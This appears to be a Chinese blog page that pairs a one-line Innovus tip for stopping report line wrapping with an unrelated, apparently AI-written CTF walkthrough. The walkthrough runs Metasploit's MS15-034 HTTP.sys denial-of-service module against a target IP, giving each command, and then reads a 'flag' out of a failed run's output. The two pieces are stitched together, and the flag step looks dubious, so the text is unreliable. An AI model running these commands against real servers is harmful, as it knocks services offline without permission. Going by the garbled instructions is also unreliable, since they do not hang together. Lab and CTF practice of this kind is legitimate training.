每日一记,修改输出rport 每行的限制

set_table_style -no_frame_fix_width -nosplit
 

通过设置该命令在innovus 中可以修改report的格式防止折行的出现。

好的,以下是在禁用内核缓存后再次运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,并获取Flag值的步骤: 1. 进入靶机的IIS管理界面 在浏览器中输入`http://<靶机IP>`,进入靶机的IIS管理界面。 2. 进入编辑输出缓存设置 在IIS管理界面中,找到需要禁用内核缓存的网站,进入该网站的“编辑输出缓存”设置页面。 3. 禁用内核缓存 在“编辑输出缓存”设置页面中,找到“高级设置”选项卡,将“启用内核缓存”选项设置为“false”,并点击“确定”按钮保存设置。 4. 调用漏洞攻击模块 ``` msf6 > use auxiliary/dos/windows/http/ms15_034_http_sys_memory_dos ``` 5. 设置目标IP地址 ``` msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set RHOST <目标IP> ``` 请将`<目标IP>`替换为您要攻击的目标IP地址。 6. 设置攻击参数 ``` msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set THREADS <线程数> msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set RPORT <目标端口> ``` 其中,`<线程数>`为要使用的线程数量,建议默认值为1;`<目标端口>`为要攻击的目标端口,默认值为80。 7. 运行攻击模块 ``` msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > run ``` 运行攻击模块后,将会自动对目标IP进行拒绝服务攻击。 8. 获取Flag值 执行完毕后,将回显结果中倒数第2行的最后一个单词作为Flag值提交即可。例如: ``` [*] Sending DoS packets to <目标IP>:80 (press CTRL+C to stop) [-] <目标IP> - DoS failed: Connection refused [*] Auxiliary module execution completed ``` 则Flag值为:`completed`。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值